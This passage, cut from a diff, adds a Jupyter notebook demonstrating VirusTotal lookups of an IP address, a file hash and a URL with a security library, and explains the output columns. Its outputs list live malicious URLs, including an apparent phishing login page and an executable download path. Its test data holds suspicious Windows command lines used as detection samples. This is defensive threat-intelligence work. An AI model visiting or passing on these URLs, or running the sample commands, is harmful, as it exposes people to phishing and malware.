http://lagarto.ru/components/com_datsogallery/img_pictures/med_shlyapa.jpg, http://lagarto.ru/components/com_datsogallery/img_pictures/med_mosk64.jpg, http://lagarto.ru/components/com_datsogallery/img_pictures/med_anton12.jpg, http://lagarto.ru/components/com_datsogallery/img_pictures/med_kap.jpg, http://clubnr.ru/assets/js/jquery-2.1.1.min.js, http://clubnr.ru/assets/js/jquery.nicescroll.min.js, http://clubnr.ru/assets/js/jquery.fancybox.pack.js, http://srbija.ru/media/system/js/jquery.js?ver=1.6.1, http://busineslunch.ru/alibaba/index.php, http://sober.name/chooser/index.htm, http://muntzart.ru/htm/family/_2_2.htm, http://4pbi.com/, http://dobraja-trapeza.ru/wp-local/(.)/excel-login-1.html, http://karkas-dom-moscow.ru/erpose/sotpie/nn_c.exe, http://karkas-dom-moscow.ru/erpose/sotpie/, http://svadba-info.ru/traditions/271, http://raev.info/.sys.php, http://rsbremer.ru/, http://gazetaniva.ru/, http://provetom.ru/prep/prep.htm'}"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Default output type for single item is a dict\n",
+    "vt_lookup.lookup_ioc(observable='90.156.201.97', ioc_type='ipv4')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### DataFrame output can be a cleaner than a dict\n",
+    "Note that re-using the same class for multiple lookups accumulates the results in the the class results DataFrame"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>ResponseCode</th>\n",
+       "      <th>RawResponse</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <th>VerboseMsg</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ScanId</th>\n",
+       "      <th>Permalink</th>\n",
+       "      <th>Positives</th>\n",
+       "      <th>MD5</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>SHA256</th>\n",
+       "      <th>ResolvedDomains</th>\n",
+       "      <th>ResolvedIPs</th>\n",
+       "      <th>DetectedUrls</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>90.156.201.97</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"asn\": \"25532\", \"undetected_downloaded_sample...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0</td>\n",
+       "      <td>IP address in dataset</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>350</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>http://remont-iphone-spb.com/, http://www.prov...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "      Observable IoCType   Status ResponseCode  \\\n",
+       "0  90.156.201.97    ipv4  Success            1   \n",
+       "\n",
+       "                                         RawResponse Resource SourceIndex  \\\n",
+       "0  {\"asn\": \"25532\", \"undetected_downloaded_sample...      NaN           0   \n",
+       "\n",
+       "              VerboseMsg Resource ScanId Permalink Positives  MD5 SHA1 SHA256  \\\n",
+       "0  IP address in dataset      NaN    NaN       NaN       350  NaN  NaN    NaN   \n",
+       "\n",
+       "                                     ResolvedDomains ResolvedIPs  \\\n",
+       "0  0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...         NaN   \n",
+       "\n",
+       "                                        DetectedUrls  \n",
+       "0  http://remont-iphone-spb.com/, http://www.prov...  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>ResponseCode</th>\n",
+       "      <th>RawResponse</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <th>VerboseMsg</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ScanId</th>\n",
+       "      <th>Permalink</th>\n",
+       "      <th>Positives</th>\n",
+       "      <th>MD5</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>SHA256</th>\n",
+       "      <th>ResolvedDomains</th>\n",
+       "      <th>ResolvedIPs</th>\n",
+       "      <th>DetectedUrls</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>90.156.201.97</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"asn\": \"25532\", \"undetected_downloaded_sample...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0</td>\n",
+       "      <td>IP address in dataset</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>350</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>http://remont-iphone-spb.com/, http://www.prov...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"scans\": {\"Bkav\": {\"detected\": true, \"version...</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>0</td>\n",
+       "      <td>Scan finished, information embedded</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...</td>\n",
+       "      <td>https://www.virustotal.com/file/54bc950d46a0d1...</td>\n",
+       "      <td>59</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>84c7201f7e59cb416280fd69a2e7f2e349ec8242</td>\n",
+       "      <td>54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                         Observable   IoCType   Status ResponseCode  \\\n",
+       "0                     90.156.201.97      ipv4  Success            1   \n",
+       "1  7657fcb7d772448a6d8504e4b20168b8  md5_hash  Success            1   \n",
+       "\n",
+       "                                         RawResponse  \\\n",
+       "0  {\"asn\": \"25532\", \"undetected_downloaded_sample...   \n",
+       "1  {\"scans\": {\"Bkav\": {\"detected\": true, \"version...   \n",
+       "\n",
+       "                           Resource SourceIndex  \\\n",
+       "0                               NaN           0   \n",
+       "1  7657fcb7d772448a6d8504e4b20168b8           0   \n",
+       "\n",
+       "                            VerboseMsg                          Resource  \\\n",
+       "0                IP address in dataset                               NaN   \n",
+       "1  Scan finished, information embedded  7657fcb7d772448a6d8504e4b20168b8   \n",
+       "\n",
+       "                                              ScanId  \\\n",
+       "0                                                NaN   \n",
+       "1  54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...   \n",
+       "\n",
+       "                                           Permalink Positives  \\\n",
+       "0                                                NaN       350   \n",
+       "1  https://www.virustotal.com/file/54bc950d46a0d1...        59   \n",
+       "\n",
+       "                                MD5                                      SHA1  \\\n",
+       "0                               NaN                                       NaN   \n",
+       "1  7657fcb7d772448a6d8504e4b20168b8  84c7201f7e59cb416280fd69a2e7f2e349ec8242   \n",
+       "\n",
+       "                                              SHA256  \\\n",
+       "0                                                NaN   \n",
+       "1  54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...   \n",
+       "\n",
+       "                                     ResolvedDomains ResolvedIPs  \\\n",
+       "0  0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...         NaN   \n",
+       "1                                                NaN         NaN   \n",
+       "\n",
+       "                                        DetectedUrls  \n",
+       "0  http://remont-iphone-spb.com/, http://www.prov...  \n",
+       "1                                                NaN  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "URL Lookup\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>ResponseCode</th>\n",
+       "      <th>RawResponse</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <th>VerboseMsg</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ScanId</th>\n",
+       "      <th>Permalink</th>\n",
+       "      <th>Positives</th>\n",
+       "      <th>MD5</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>SHA256</th>\n",
+       "      <th>ResolvedDomains</th>\n",
+       "      <th>ResolvedIPs</th>\n",
+       "      <th>DetectedUrls</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>90.156.201.97</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"asn\": \"25532\", \"undetected_downloaded_sample...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0</td>\n",
+       "      <td>IP address in dataset</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>350</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>http://remont-iphone-spb.com/, http://www.prov...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"scans\": {\"Bkav\": {\"detected\": true, \"version...</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>0</td>\n",
+       "      <td>Scan finished, information embedded</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...</td>\n",
+       "      <td>https://www.virustotal.com/file/54bc950d46a0d1...</td>\n",
+       "      <td>59</td>\n",
+       "      <td>7657fcb7d772448a6d8504e4b20168b8</td>\n",
+       "      <td>84c7201f7e59cb416280fd69a2e7f2e349ec8242</td>\n",
+       "      <td>54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>http://club-fox.ru/img/www.loginalibaba.com/al...</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"scan_id\": \"700994c09c45224fd5d6cb938e043ce64...</td>\n",
+       "      <td>http://club-fox.ru/img/www.loginalibaba.com/al...</td>\n",
+       "      <td>0</td>\n",
+       "      <td>Scan finished, scan information embedded in th...</td>\n",
+       "      <td>http://club-fox.ru/img/www.loginalibaba.com/al...</td>\n",
+       "      <td>700994c09c45224fd5d6cb938e043ce648baa2231401e7...</td>\n",
+       "      <td>https://www.virustotal.com/url/700994c09c45224...</td>\n",
+       "      <td>12</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                          Observable   IoCType   Status  \\\n",
+       "0                                      90.156.201.97      ipv4  Success   \n",
+       "1                   7657fcb7d772448a6d8504e4b20168b8  md5_hash  Success   \n",
+       "2  http://club-fox.ru/img/www.loginalibaba.com/al...       url  Success   \n",
+       "\n",
+       "  ResponseCode                                        RawResponse  \\\n",
+       "0            1  {\"asn\": \"25532\", \"undetected_downloaded_sample...   \n",
+       "1            1  {\"scans\": {\"Bkav\": {\"detected\": true, \"version...   \n",
+       "2            1  {\"scan_id\": \"700994c09c45224fd5d6cb938e043ce64...   \n",
+       "\n",
+       "                                            Resource SourceIndex  \\\n",
+       "0                                                NaN           0   \n",
+       "1                   7657fcb7d772448a6d8504e4b20168b8           0   \n",
+       "2  http://club-fox.ru/img/www.loginalibaba.com/al...           0   \n",
+       "\n",
+       "                                          VerboseMsg  \\\n",
+       "0                              IP address in dataset   \n",
+       "1                Scan finished, information embedded   \n",
+       "2  Scan finished, scan information embedded in th...   \n",
+       "\n",
+       "                                            Resource  \\\n",
+       "0                                                NaN   \n",
+       "1                   7657fcb7d772448a6d8504e4b20168b8   \n",
+       "2  http://club-fox.ru/img/www.loginalibaba.com/al...   \n",
+       "\n",
+       "                                              ScanId  \\\n",
+       "0                                                NaN   \n",
+       "1  54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...   \n",
+       "2  700994c09c45224fd5d6cb938e043ce648baa2231401e7...   \n",
+       "\n",
+       "                                           Permalink Positives  \\\n",
+       "0                                                NaN       350   \n",
+       "1  https://www.virustotal.com/file/54bc950d46a0d1...        59   \n",
+       "2  https://www.virustotal.com/url/700994c09c45224...        12   \n",
+       "\n",
+       "                                MD5                                      SHA1  \\\n",
+       "0                               NaN                                       NaN   \n",
+       "1  7657fcb7d772448a6d8504e4b20168b8  84c7201f7e59cb416280fd69a2e7f2e349ec8242   \n",
+       "2                               NaN                                       NaN   \n",
+       "\n",
+       "                                              SHA256  \\\n",
+       "0                                                NaN   \n",
+       "1  54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc...   \n",
+       "2                                                NaN   \n",
+       "\n",
+       "                                     ResolvedDomains ResolvedIPs  \\\n",
+       "0  0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...         NaN   \n",
+       "1                                                NaN         NaN   \n",
+       "2                                                NaN         NaN   \n",
+       "\n",
+       "                                        DetectedUrls  \n",
+       "0  http://remont-iphone-spb.com/, http://www.prov...  \n",
+       "1                                                NaN  \n",
+       "2                                                NaN  "
+      ]
+     },
+     "execution_count": 34,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# DataFrame output can be a cleaner\n",
+    "vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)\n",
+    "\n",
+    "print('IP Lookup')\n",
+    "display(vt_lookup.lookup_ioc(observable='90.156.201.97', \n",
+    "                             ioc_type='ipv4', output='dataframe'))\n",
+    "\n",
+    "print('\\n+ MD5 Hash Lookup')\n",
+    "display(vt_lookup.lookup_ioc(observable='7657fcb7d772448a6d8504e4b20168b8', \n",
+    "                             ioc_type='md5_hash', output='dataframe'))\n",
+    "    \n",
+    "print('\\n+ URL Lookup')\n",
+    "\n",
+    "url ='http://club-fox.ru/img/www.loginalibaba.com/alibaba/alibaba/login.alibaba.com.php?email=biuro'\n",
+    "vt_lookup.lookup_ioc(observable=url, ioc_type='url', output='dataframe')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='interpreting_output'></a>[Contents](#contents)\n",
+    "## Interpreting the Output\n",
+    "Columns in the output dataframe are as follows:\n",
+    " - Observable - The IoC observable submitted\n",
+    " - IoCType - the IoC type\n",
+    " - Status - the status of the submission request\n",
+    " - ResponseCode - the VT response code\n",
+    " - RawResponse - the entire raw json response\n",
+    " - Resource - VT Resource\n",
+    " - SourceIndex - The index of the Observable in the source DataFrame. You can use this to rejoin to your original data.\n",
+    " - VerboseMsg - VT Verbose Message\n",
+    " - ScanId - VT Scan ID if any\n",
+    " - Permalink - VT Permanent URL describing the resource\n",
+    " - Positives - If this is not zero, it indicates the number of malicious reports that VT holds for this observable.\n",
+    " - MD5 - The MD5 hash, if any\n",
+    " - SHA1 - The MD5 hash, if any\n",
+    " - SHA256 - The MD5 hash, if any\n",
+    " - ResolvedDomains - In the case of IP Addresses, this contains a list of all domains that resolve to this IP address\n",
+    " - ResolvedIPs - In the case Domains, this contains a list of all IP addresses resolved from the domain.\n",
+    " - DetectedUrls - Any malicious URLs associated with the observable."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Observable</th>\n",
+       "      <td>90.156.201.97</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>IoCType</th>\n",
+       "      <td>ipv4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Status</th>\n",
+       "      <td>Success</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResponseCode</th>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>RawResponse</th>\n",
+       "      <td>{\"undetected_downloaded_samples\": [{\"date\": \"2...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Resource</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>VerboseMsg</th>\n",
+       "      <td>IP address in dataset</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Resource</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ScanId</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Permalink</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Positives</th>\n",
+       "      <td>350</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>MD5</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SHA1</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SHA256</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResolvedDomains</th>\n",
+       "      <td>0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResolvedIPs</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>DetectedUrls</th>\n",
+       "      <td>http://remont-iphone-spb.com/, http://www.prov...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                 0\n",
+       "Observable                                           90.156.201.97\n",
+       "IoCType                                                       ipv4\n",
+       "Status                                                     Success\n",
+       "ResponseCode                                                     1\n",
+       "RawResponse      {\"undetected_downloaded_samples\": [{\"date\": \"2...\n",
+       "Resource                                                       NaN\n",
+       "SourceIndex                                                      0\n",
+       "VerboseMsg                                   IP address in dataset\n",
+       "Resource                                                       NaN\n",
+       "ScanId                                                         NaN\n",
+       "Permalink                                                      NaN\n",
+       "Positives                                                      350\n",
+       "MD5                                                            NaN\n",
+       "SHA1                                                           NaN\n",
+       "SHA256                                                         NaN\n",
+       "ResolvedDomains  0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma...\n",
+       "ResolvedIPs                                                    NaN\n",
+       "DetectedUrls     http://remont-iphone-spb.com/, http://www.prov..."
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "14456 resolved domains\n",
+      "Showing first 10\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "['0-1000v.ru',\n",
+       " ' 00004.ru',\n",
+       " ' 01sasha.ru',\n",
+       " ' 027.ru',\n",
+       " ' 03magnet.com',\n",
+       " ' 03magnet.ru',\n",
+       " ' 04gaz.ru',\n",
+       " ' 0525.ru',\n",
+       " ' 0987654321.ru',\n",
+       " ' 0notole.ru']"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "4870 detected urls\n",
+      "Showing first 10 (Don't click on any of these!)\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "['http://remont-iphone-spb.com/',\n",
+       " ' http://www.provetom.ru/art/art_2.htm',\n",
+       " ' http://gubino.net/',\n",
+       " ' http://thar.ru/',\n",
+       " ' http://alliance-pravo.com/',\n",
+       " ' http://ventkanal.ru/kwdl38g',\n",
+       " ' http://autolombard.club/',\n",
+       " ' http://moscowbmw.ru/',\n",
+       " ' http://belowtheweb.ru/avia/300%C3%97500/images/pikz.zip',\n",
+       " ' http://www.maxsev.ru/']"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display(pd.DataFrame(vt_lookup.results.loc[0].T))\n",
+    "print(f'{len(vt_lookup.results.loc[0].ResolvedDomains)} resolved domains')\n",
+    "print('Showing first 10')\n",
+    "display(vt_lookup.results.loc[0].ResolvedDomains.split(',')[0:10])\n",
+    "\n",
+    "print(f'{len(vt_lookup.results.loc[0].DetectedUrls)} detected urls')\n",
+    "print('Showing first 10 (Don\\'t click on any of these!)')\n",
+    "display(vt_lookup.results.loc[0].DetectedUrls.split(',')[0:10])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### IoC Types Available\n",
+    "There are 4 basic IoC types used by Virus Total. Hashes of all types (include SHA256 Authenticode) are covered by the 'file' type."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['ipv4', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sh256_hash']"
+      ]
+     },
+     "execution_count": 26,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Types that you need to supply to the lookup calls\n",
+    "VTLookup._SUPPORTED_INPUT_TYPES"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'ipv4': 'ip-address',\n",
+       " 'ipv6': None,\n",
+       " 'dns': 'domain',\n",
+       " 'url': 'url',\n",
+       " 'md5_hash': 'file',\n",
+       " 'sha1_hash': 'file',\n",
+       " 'sh256_hash': 'file'}"
+      ]
+     },
+     "execution_count": 27,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# How these map to VT lookup types\n",
+    "VTLookup._VT_TYPE_MAP"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='dataframe_input'></a>[Contents](#contents)\n",
+    "## Input from a DataFrame\n",
+    "\n",
+    "**WARNING** The VirusTotal Public API allows a maximum of 4 requests a minute. If you start seeing HTTP Error 403, you've probably hit this limit\n",
+    "\n",
+    "API Signature\n",
+    "```\n",
+    "vt_lookup.lookup_iocs(\n",
+    "    ['data: pandas.core.frame.DataFrame', \"src_col: str = 'Observable'\", \"type_col: str = 'IoCType'\", \"src_index_col: str = 'SourceIndex'\", '**kwargs'],\n",
+    ") -> pandas.core.frame.DataFrame\n",
+    "Docstring:\n",
+    "lookup_iocs: main lookup method.\n",
+    "\n",
+    "Tries to retrieve results for IoC observables in the source dataframe.\n",
+    "\n",
+    "    :param data: dataframe containing the observables to search for\n",
+    "    :param src_col: the column name that contains the observable data\n",
+    "        (one item per row)\n",
+    "    :param type_col: the column name containing the observable type\n",
+    "    :param source_index: the name of the column to use as source index. If not\n",
+    "        specified this defaults to 'SourceIndex'. If this (or the supplied value)\n",
+    "        is not in the source dataframe the index of the source dataframe will\n",
+    "        be used. This is retained in the output so that you can join the results\n",
+    "        back to the original data.\n",
+    "    :param kwargs: key/value pairs of additional mappings to supported IoC type names\n",
+    "        e.g. ipv4='ipaddress', url='httprequest'. This allows you to specify custom\n",
+    "        mappings when the source data is tagged with different names.\n",
+    "\n",
+    "Returns:\n",
+    "    pd.DataFrame: VT Results\n",
+    "\n",
+    "See supported_ioc_types attribute for a list of valid target types.\n",
+    "Not all of these types are supported by VirusTotal. See ioc_vt_type_mapping for\n",
+    "current mappings. Types mapped to None will not be submitted to VT.\n",
+    "\n",
+    "For urls a full http request can be submitted, query string and fragments will be\n",
+    "dropped before submitting. Other supported protocols are ftp, telnet, ldap, file\n",
+    "For files MD5, SHA1 and SHA256 hashes are supported.\n",
+    "For IP addresses only dotted IPv4 addresses are supported.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### Load test data and extract some IoCs from it"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CommandLine</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>.\\rundll32  /C 42424.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                         CommandLine\n",
+       "0                   .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe\n",
+       "1  .\\reg  not /domain:everything that /sid:shines...\n",
